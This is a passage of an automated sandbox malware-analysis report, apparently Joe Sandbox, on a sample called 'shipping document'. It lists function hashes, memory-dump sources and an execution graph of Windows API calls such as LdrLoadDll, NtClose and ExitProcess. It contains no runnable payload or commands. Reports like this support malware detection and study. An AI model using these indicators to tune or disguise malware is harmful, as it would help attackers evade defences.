                                                                                                • Opcode Fuzzy Hash: 2ddb1423077d2e8bffa1402e396c07066cd8c08e93c856fbc6bf8c531391db66
                                                                                                • Instruction Fuzzy Hash: 50016675E01208AFDB44DFA9C589A9DBFF1EF88310F15C195A8089B365DA31E991DF40
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 07C56878 Relevance: .0, Instructions: 22COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1683029206.0000000007C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C50000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_7c50000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 8547f3750b4d0a3f43e0212a3f1529b0b69e719813eada05de4bd4405baed55a
                                                                                                • Instruction ID: 112debd709584861ec8869fff401035e71831fad63f535ac844f240efd62c40f
                                                                                                • Opcode Fuzzy Hash: 8547f3750b4d0a3f43e0212a3f1529b0b69e719813eada05de4bd4405baed55a
                                                                                                • Instruction Fuzzy Hash: BFE0E5B4E04208EFCB44DFA9D5816ACBBF4EB89304F10C0A9DC09A3340DA36AA42CF41
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 07C56E80 Relevance: .0, Instructions: 13COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1683029206.0000000007C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C50000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_7c50000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: f61e2b33fa74e696500afba2a418ba6eb2c81a888da694783b1211f47a0cef98
                                                                                                • Instruction ID: 7829a8c9a5f93e01bcee108fd7542aa0e1ab5ba95bea634a077f04e4fcc065ac
                                                                                                • Opcode Fuzzy Hash: f61e2b33fa74e696500afba2a418ba6eb2c81a888da694783b1211f47a0cef98
                                                                                                • Instruction Fuzzy Hash: 81C012B145520C9BC750EAB8D5096597FA8D705715F004194E80993500EA726580D665
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 07C5E3D8 Relevance: .0, Instructions: 8COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1683029206.0000000007C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C50000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_7c50000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: f02288fbf156e567419c38978df2cbded80a3f77428e87a0d2f02c52b44584b3
                                                                                                • Instruction ID: b7ae7340c6eaeeb9411640101555b455942d3580ee0e62d7433b4cfa38307331
                                                                                                • Opcode Fuzzy Hash: f02288fbf156e567419c38978df2cbded80a3f77428e87a0d2f02c52b44584b3
                                                                                                • Instruction Fuzzy Hash: 6AB092B52A8100A284046AA4888093A9650EFA2704F40AC252A8640080996299A9A21F
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Non-executed Functions

                                                                                                Function 07C58250 Relevance: 3.9, Strings: 3, Instructions: 155COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1683029206.0000000007C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C50000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_7c50000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 7Z/t$RWIK$[[bb
                                                                                                • API String ID: 0-1157992699
                                                                                                • Opcode ID: 905ba5e6b1fe7ad5151a4d5a24c091a8a327a14b2bfbfea9e059ed245ef0ace2
                                                                                                • Instruction ID: fe758d34bcbaec456a1b0e8d5a66752d7c9ed8bd15fa0dab403cf924a2f1b504
                                                                                                • Opcode Fuzzy Hash: 905ba5e6b1fe7ad5151a4d5a24c091a8a327a14b2bfbfea9e059ed245ef0ace2
                                                                                                • Instruction Fuzzy Hash: DF512CB0E1560ACFCB08CFAAC9415AEFFF2EF89301F14D469D415A7254D7349A828F98
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 07C56EB8 Relevance: 1.3, Strings: 1, Instructions: 72COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1683029206.0000000007C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C50000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_7c50000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 0
                                                                                                • API String ID: 0-4108050209
                                                                                                • Opcode ID: 6c15930c49f3f9ed08d4decabdb7484a516a3624072f74039807098535ae2b8b
                                                                                                • Instruction ID: b64ac3e53e6b2f97ee96e83aa8c7605dad7f2acc0081878c49143a63884aa2c9
                                                                                                • Opcode Fuzzy Hash: 6c15930c49f3f9ed08d4decabdb7484a516a3624072f74039807098535ae2b8b
                                                                                                • Instruction Fuzzy Hash: 7321C9B1E016189BEB58CFABD84079EFBF7AFC8300F14C0BAD408A6254DB315A858F51
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0315D51C Relevance: .3, Instructions: 264COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1676258138.0000000003150000.00000040.00000800.00020000.00000000.sdmp, Offset: 03150000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_3150000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: ab65efc53916ea49eb3b1e8089db4ec107664acf52d6f815ac119c8454b2a928
                                                                                                • Instruction ID: d1e305982d6492edf546a679d5260492e33eb32787c220794449ead848978f7e
                                                                                                • Opcode Fuzzy Hash: ab65efc53916ea49eb3b1e8089db4ec107664acf52d6f815ac119c8454b2a928
                                                                                                • Instruction Fuzzy Hash: 73A16036E10209CFCF09DFB5C88459EB7B6FF89300B1985AAEC15AB265DB71D946CB40
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 07C5F0F0 Relevance: .3, Instructions: 264COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1683029206.0000000007C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C50000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_7c50000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 1d335103022cde9f0527568303c6590ff5ecbeafe68b55ef7417af48afce58a5
                                                                                                • Instruction ID: 3791ee5014cfec7b17a27dea8a3ffc5382c7aca97e764a4fa4ffeab5f5f68881
                                                                                                • Opcode Fuzzy Hash: 1d335103022cde9f0527568303c6590ff5ecbeafe68b55ef7417af48afce58a5
                                                                                                • Instruction Fuzzy Hash: FBD12935D2061A9ACB04EBA4D9906A9F771FFD5300F60DB9AE44937220EF706ED4CB51
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 07C5AA08 Relevance: .2, Instructions: 184COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1683029206.0000000007C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C50000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_7c50000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 0042eba7a8c3eb09db87568399439bb9720b9d794e4c9c6af448d8a5c1be5345
                                                                                                • Instruction ID: d508a2cf746cfe0298ab1499427011015076912c6875579ca403a8b5ba9525d7
                                                                                                • Opcode Fuzzy Hash: 0042eba7a8c3eb09db87568399439bb9720b9d794e4c9c6af448d8a5c1be5345
                                                                                                • Instruction Fuzzy Hash: DE81B1B4E15219CFCB44CFAAC58499EBBF1FF89310F149559D819AB321D334AA42CF98
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 07C58718 Relevance: .2, Instructions: 171COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1683029206.0000000007C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C50000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_7c50000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 59466f83b2be88719072eeefb57bc4e28f0bae4d41903065bd1b711f9cca25b5
                                                                                                • Instruction ID: 9397e0eb827f09c0530d480b2a660a81ebb82083b166b2a8b4c5e8cbf4983b68
                                                                                                • Opcode Fuzzy Hash: 59466f83b2be88719072eeefb57bc4e28f0bae4d41903065bd1b711f9cca25b5
                                                                                                • Instruction Fuzzy Hash: B87127B4E1120A9FCB04CF9AD5819EEFBF1FB89390F108569E811AB354D3359A81CF94
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 07C5BE78 Relevance: .2, Instructions: 162COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1683029206.0000000007C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C50000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_7c50000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 26946426b1b82ff9cbf80b15d69da6a09db507e4bb2fd7f702488161cbcb3bfc
                                                                                                • Instruction ID: a7f1a8f34eb797a16915a4106810660b2038038d8357fa1e0cc571ea8edbc171
                                                                                                • Opcode Fuzzy Hash: 26946426b1b82ff9cbf80b15d69da6a09db507e4bb2fd7f702488161cbcb3bfc
                                                                                                • Instruction Fuzzy Hash: 5061E2B092570ADBC740DF91E68B259BFB1FFC9300F209495C885A7198DF766BA0CB58
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 07C5B8C0 Relevance: .2, Instructions: 153COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1683029206.0000000007C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C50000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_7c50000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 26c6b622b63e41eac2e17ad9ea42e9ac3dd4f2846f0050a0b5fa28883d0d48f2
                                                                                                • Instruction ID: 269d643694f435981beab52c12653fadc70cbb437b99c35617bfaa6f377b7c3e
                                                                                                • Opcode Fuzzy Hash: 26c6b622b63e41eac2e17ad9ea42e9ac3dd4f2846f0050a0b5fa28883d0d48f2
                                                                                                • Instruction Fuzzy Hash: B861E6B1E1520EDFCB04CFAAC5815AEFFB2BF89300F14945AD825A7244D3359A818F95
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 07C5D850 Relevance: .1, Instructions: 142COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1683029206.0000000007C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C50000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_7c50000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: d3bfc302ddce0f93cfe7f994ead6f5e19d621d241da82f1dc863cf879e6a5190
                                                                                                • Instruction ID: 4fa3eadfcfc894c35d14619cd2dc35ce5e01d38bf33e242903eec0f308c98b90
                                                                                                • Opcode Fuzzy Hash: d3bfc302ddce0f93cfe7f994ead6f5e19d621d241da82f1dc863cf879e6a5190
                                                                                                • Instruction Fuzzy Hash: 2C5129B0E1631ADBCB04CFAAD5855AEFBF2FB89310F10942AD406A7354D7355A818F94
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 07C50006 Relevance: .1, Instructions: 113COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1683029206.0000000007C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C50000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_7c50000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 00c2efc1cea9f75c5c8ac7fcc2824302fc31d730e3d584ce755d8676bd333ae3
                                                                                                • Instruction ID: 3dcc4c885bec0567388a0ddf72718faceb147e7c587b95214d90e75802191917
                                                                                                • Opcode Fuzzy Hash: 00c2efc1cea9f75c5c8ac7fcc2824302fc31d730e3d584ce755d8676bd333ae3
                                                                                                • Instruction Fuzzy Hash: C04172B1D016588FE71DCF6B8C512DAFBF3AFC5210F19C1BA884CAB215EA3509968F51
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 07C50040 Relevance: .1, Instructions: 109COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1683029206.0000000007C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C50000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_7c50000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 65fc4575eed17c6fb0cdb6334e23351b44ce76b84f35a5d4aa0cc3176a73ec87
                                                                                                • Instruction ID: 31252a7545af389b88b9d52bfb04dd9a5ddddb04fb6320362ce4e92127a563f3
                                                                                                • Opcode Fuzzy Hash: 65fc4575eed17c6fb0cdb6334e23351b44ce76b84f35a5d4aa0cc3176a73ec87
                                                                                                • Instruction Fuzzy Hash: 8A4162B1D016188BEB1CCF6B8D4069EFBF3AFC9301F18C1BA881CAA255EB3505958F55
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 07C5BC30 Relevance: .1, Instructions: 101COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1683029206.0000000007C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07C50000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_7c50000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 091bc09aae2e4e454b7a82e7639be10796649f6479ea891393759cf37ed488c3
                                                                                                • Instruction ID: 2119ef1007c55ed6d3b73ecab4b700cb9ec92f77482c10a5b0c6a58765494704
                                                                                                • Opcode Fuzzy Hash: 091bc09aae2e4e454b7a82e7639be10796649f6479ea891393759cf37ed488c3
                                                                                                • Instruction Fuzzy Hash: 6141C9B0D0560ADBDB04CFAAC5815EEFFF2BF89300F14D12AD815A7254D775AA818F98
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Execution Graph

                                                                                                Execution Coverage:1.2%
                                                                                                Dynamic/Decrypted Code Coverage:4.8%
                                                                                                Signature Coverage:7.5%
                                                                                                Total number of Nodes:146
                                                                                                Total number of Limit Nodes:14
                                                                                                execution_graph 94117 423f03 94118 423f1f 94117->94118 94119 423f47 94118->94119 94120 423f5b 94118->94120 94121 42b113 NtClose 94119->94121 94127 42b113 94120->94127 94123 423f50 94121->94123 94124 423f64 94130 42d133 RtlAllocateHeap 94124->94130 94126 423f6f 94128 42b130 94127->94128 94129 42b141 NtClose 94128->94129 94129->94124 94130->94126 94233 42a733 94234 42a74d 94233->94234 94237 17a2df0 LdrInitializeThunk 94234->94237 94235 42a775 94237->94235 94238 42e0f3 94239 42e103 94238->94239 94240 42e109 94238->94240 94243 42d0f3 94240->94243 94242 42e12f 94246 42b423 94243->94246 94245 42d10e 94245->94242 94247 42b440 94246->94247 94248 42b451 RtlAllocateHeap 94247->94248 94248->94245 94249 424293 94254 4242a2 94249->94254 94250 42432c 94251 4242e9 94252 42d013 RtlFreeHeap 94251->94252 94253 4242f9 94252->94253 94254->94250 94254->94251 94255 424327 94254->94255 94256 42d013 RtlFreeHeap 94255->94256 94256->94250 94257 41ab73 94258 41abb7 94257->94258 94259 41abd8 94258->94259 94260 42b113 NtClose 94258->94260 94260->94259 94261 413b13 94262 413b2c 94261->94262 94267 417513 94262->94267 94264 413b4a 94265 413b96 94264->94265 94266 413b83 PostThreadMessageW 94264->94266 94266->94265 94268 417537 94267->94268 94269 417573 LdrLoadDll 94268->94269 94270 41753e 94268->94270 94269->94270 94270->94264 94271 41dc93 94272 41dcb9 94271->94272 94278 41ddb0 94272->94278 94280 42e223 94272->94280 94274 41dd4b 94275 41dda7 94274->94275 94276 42a783 LdrInitializeThunk 94274->94276 94274->94278 94275->94278 94286 427843 94275->94286 94276->94275 94279 41de5d 94281 42e193 94280->94281 94282 42d0f3 RtlAllocateHeap 94281->94282 94283 42e1f0 94281->94283 94284 42e1cd 94282->94284 94283->94274 94285 42d013 RtlFreeHeap 94284->94285 94285->94283 94287 4278a0 94286->94287 94288 4278db 94287->94288 94291 418513 94287->94291 94288->94279 94290 4278bd 94290->94279 94292 4184dc 94291->94292 94293 42b4c3 ExitProcess 94292->94293 94295 418543 94292->94295 94294 4184fb 94293->94294 94294->94290 94295->94290 94296 418718 94297 42b113 NtClose 94296->94297 94298 418722 94297->94298 94299 17a2b60 LdrInitializeThunk 94131 401ace 94132 401ad8 94131->94132 94135 42e5b3 94132->94135 94133 401c38 94133->94133 94138 42cbd3 94135->94138 94139 42cbf9 94138->94139 94150 407343 94139->94150 94141 42cc22 94142 42cc73 94141->94142 94153 41a983 94141->94153 94142->94133 94144 42cc41 94145 42cc56 94144->94145 94168 42b4c3 94144->94168 94164 4271b3 94145->94164 94148 42cc65 94149 42b4c3 ExitProcess 94148->94149 94149->94142 94171 416243 94150->94171 94152 407350 94152->94141 94154 41a9af 94153->94154 94195 41a873 94154->94195 94157 41a9f4 94160 41aa10 94157->94160 94162 42b113 NtClose 94157->94162 94158 41a9dc 94159 42b113 NtClose 94158->94159 94161 41a9e7 94158->94161 94159->94161 94160->94144 94161->94144 94163 41aa06 94162->94163 94163->94144 94165 42720d 94164->94165 94167 42721a 94165->94167 94206 418063 94165->94206 94167->94148 94169 42b4dd 94168->94169 94170 42b4ee ExitProcess 94169->94170 94170->94145 94172 41625a 94171->94172 94174 416273 94172->94174 94175 42bb43 94172->94175 94174->94152 94177 42bb5b 94175->94177 94176 42bb7f 94176->94174 94177->94176 94182 42a783 94177->94182 94183 42a7a0 94182->94183 94189 17a2c0a 94183->94189 94184 42a7cc 94186 42d013 94184->94186 94192 42b473 94186->94192 94188 42bbed 94188->94174 94190 17a2c1f LdrInitializeThunk 94189->94190 94191 17a2c11 94189->94191 94190->94184 94191->94184 94193 42b48d 94192->94193 94194 42b49e RtlFreeHeap 94193->94194 94194->94188 94196 41a969 94195->94196 94197 41a88d 94195->94197 94196->94157 94196->94158 94201 42a823 94197->94201 94200 42b113 NtClose 94200->94196 94202 42a840 94201->94202 94205 17a35c0 LdrInitializeThunk 94202->94205 94203 41a95d 94203->94200 94205->94203 94207 41808d 94206->94207 94213 4184fb 94207->94213 94214 413c43 94207->94214 94209 41819a 94210 42d013 RtlFreeHeap 94209->94210 94209->94213 94211 4181b2 94210->94211 94212 42b4c3 ExitProcess 94211->94212 94211->94213 94212->94213 94213->94167 94215 413c62 94214->94215 94216 413db7 94215->94216 94222 413d80 94215->94222 94223 413693 94215->94223 94216->94209 94218 413d94 94218->94216 94227 41ac93 RtlFreeHeap LdrInitializeThunk 94218->94227 94220 413dad 94220->94209 94222->94216 94226 41ac93 RtlFreeHeap LdrInitializeThunk 94222->94226 94228 42b383 94223->94228 94226->94218 94227->94220 94229 42b39d 94228->94229 94232 17a2c70 LdrInitializeThunk 94229->94232 94230 4136b5 94230->94222 94232->94230

                                                                                                Executed Functions

                                                                                                Function 00417513 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 117 417513-41752f 118 417537-41753c 117->118 119 417532 call 42dd13 117->119 120 417542-417550 call 42e233 118->120 121 41753e-417541 118->121 119->118 124 417560-417571 call 42c6a3 120->124 125 417552-41755d call 42e4d3 120->125 130 417573-417587 LdrLoadDll 124->130 131 41758a-41758d 124->131 125->124 130->131
                                                                                                APIs
                                                                                                • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417585
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2032796912.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_shipping document.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Load
                                                                                                • String ID:
                                                                                                • API String ID: 2234796835-0
                                                                                                • Opcode ID: e664350d3b18a872910a2329561922eb13d4743b4bf9a0e59bc9062858898256
                                                                                                • Instruction ID: 692baee536fc85d45d8f5272c9dd5b7818b6c4763b3c56550855297470eab6f4
                                                                                                • Opcode Fuzzy Hash: e664350d3b18a872910a2329561922eb13d4743b4bf9a0e59bc9062858898256
                                                                                                • Instruction Fuzzy Hash: 71011EB5E4020DBBDF10DBA5DC42FDEB3789B54308F0041AAE90997240F675EB548B95
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0042B113 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 142 42b113-42b14f call 404a63 call 42c1a3 NtClose
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2032796912.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_shipping document.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Close
                                                                                                • String ID:
                                                                                                • API String ID: 3535843008-0
                                                                                                • Opcode ID: 0b89b8632e4c096b591067a196dcc1e00f309b2dcf3a78b98b3137c54167835c
                                                                                                • Instruction ID: 512b6dafabffc831d4637437a96f4137475468cfe2d01e7ed9237de541fbfcec
                                                                                                • Opcode Fuzzy Hash: 0b89b8632e4c096b591067a196dcc1e00f309b2dcf3a78b98b3137c54167835c
                                                                                                • Instruction Fuzzy Hash: C1E04F753102147FD520EA5ADC42F9BB79CDBC5714F40411AFA4867241C770BA118BB4
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 017A2B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 156 17a2b60-17a2b6c LdrInitializeThunk
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeThunk
                                                                                                • String ID:
                                                                                                • API String ID: 2994545307-0
                                                                                                • Opcode ID: 9e9322434b2c80d57779e2bc5df216df9a01b25bab8317b80ea47d90b7f7db6b
                                                                                                • Instruction ID: d1bbd7a56aa926045ab500309141810a7982c04501c36092dcf8a7f5640fb2f3
                                                                                                • Opcode Fuzzy Hash: 9e9322434b2c80d57779e2bc5df216df9a01b25bab8317b80ea47d90b7f7db6b
                                                                                                • Instruction Fuzzy Hash: AF90026120640003420571584854756800E97E0201B55C031E10155A0DC6258A916626
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 017A2DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeThunk
                                                                                                • String ID:
                                                                                                • API String ID: 2994545307-0
                                                                                                • Opcode ID: 66566e5324c411294aee6ea77a082979456e2e89ac7778881acd4fec252be266
                                                                                                • Instruction ID: 93bf84b35b385a03ebd9d4eb5b7d3136de2272013c6231e4e5780f8471254a43
                                                                                                • Opcode Fuzzy Hash: 66566e5324c411294aee6ea77a082979456e2e89ac7778881acd4fec252be266
                                                                                                • Instruction Fuzzy Hash: A590023120540413D21171584944747400D97D0241F95C422A0425568DD7568B52A622
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 017A2C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeThunk
                                                                                                • String ID:
                                                                                                • API String ID: 2994545307-0
                                                                                                • Opcode ID: 83c0a22cd04d2082a8a637116ef8b0b87d021974932a0cb50d6e19576ab01ae9
                                                                                                • Instruction ID: de621f6157bbc52c31fa519af203a8103e5a1febd5e9ee321d1d7cc6e07259c3
                                                                                                • Opcode Fuzzy Hash: 83c0a22cd04d2082a8a637116ef8b0b87d021974932a0cb50d6e19576ab01ae9
                                                                                                • Instruction Fuzzy Hash: 7E90023120548802D2107158884478A400997D0301F59C421A4425668DC7958A917622
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 017A35C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2033450578.0000000001730000.00000040.00001000.00020000.00000000.sdmp, Offset: 01730000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1730000_shipping document.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeThunk
                                                                                                • String ID:
                                                                                                • API String ID: 2994545307-0
                                                                                                • Opcode ID: dc04d0c014db1a2a9a4a1d6cc43dde307f790831ffe43d47550e8faeeae2732c
                                                                                                • Instruction ID: 6e3f2de1a2fd442153be7f6b09e26ca42e409fbddbd3b35c61a7a0c2142a98eb
                                                                                                • Opcode Fuzzy Hash: dc04d0c014db1a2a9a4a1d6cc43dde307f790831ffe43d47550e8faeeae2732c
                                                                                                • Instruction Fuzzy Hash: A090023160950402D20071584954746500997D0201F65C421A0425578DC7958B516AA3
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00413B0B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 65threadwindowCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                • PostThreadMessageW.USER32(03F67l1929,00000111,00000000,00000000), ref: 00413B90
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.2032796912.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_400000_shipping document.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: MessagePostThread
                                                                                                • String ID: 03F67l1929$03F67l1929
                                                                                                • API String ID: 1836367815-2233601777
                                                                                                • Opcode ID: 95b629c9a65b41e5bc062fcca5d04ce99698d12f9a4ccf190d3b250a2daeb292
                                                                                                • Instruction ID: efc3c3d89b0114ef7295a8d8b15fe6c79a45177fe29f246ab4f7dcfc094fed4d
